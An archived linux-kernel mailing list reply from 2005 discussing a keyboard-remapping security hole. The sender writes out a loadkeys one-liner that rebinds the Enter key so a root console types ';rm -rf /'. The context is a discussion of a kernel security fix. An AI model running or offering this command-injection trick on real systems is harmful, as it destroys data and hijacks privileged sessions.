Re: security / kbd

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



On Sat, 3 Dec 2005, Andries Brouwer wrote:
> On Sat, Dec 03, 2005 at 03:11:42AM +0100, Bodo Eggert wrote:
> > On Sat, 3 Dec 2005, Andries Brouwer wrote:

> > > Let me repeat what I said and you snipped:
> > > If there is a security problem, then it should be solved in user space.
> > 
> > By killing and disabeling all remote logins when root logs in or by 
> > ptracing each user program during root sessions? You'd have to do this 
> > until we find somebody to do the correct fix in the kernel.
> 
> Please describe the perceived security problem.
> I see words, but no problem.

> You log in remotely to my machine. Want to do something evil.
> What precisely do you do?

echo -e 'keycode 28 F70
         string  F70 ";rm -rf /\x0a"' | loadkeys > /proc/0815/fd/1

where process 0815 is a "sleep 2147483647&"

> 2.0.34% loadkeys -d
> Couldnt get a file descriptor referring to the console

I had stale permissions on /dev/tty0. With correct permission settings, 
you'll need a session belonging to the malicious user.

-- 
'Calm down -- it's only ones and zeros.' 
-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to [email protected]
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/

[Index of Archives]     [Kernel Newbies]     [Netfilter]     [Bugtraq]     [Photo]     [Stuff]     [Gimp]     [Yosemite News]     [MIPS Linux]     [ARM Linux]     [Linux Security]     [Linux RAID]     [Video 4 Linux]     [Linux for the blind]     [Linux Resources]
  Powered by Linux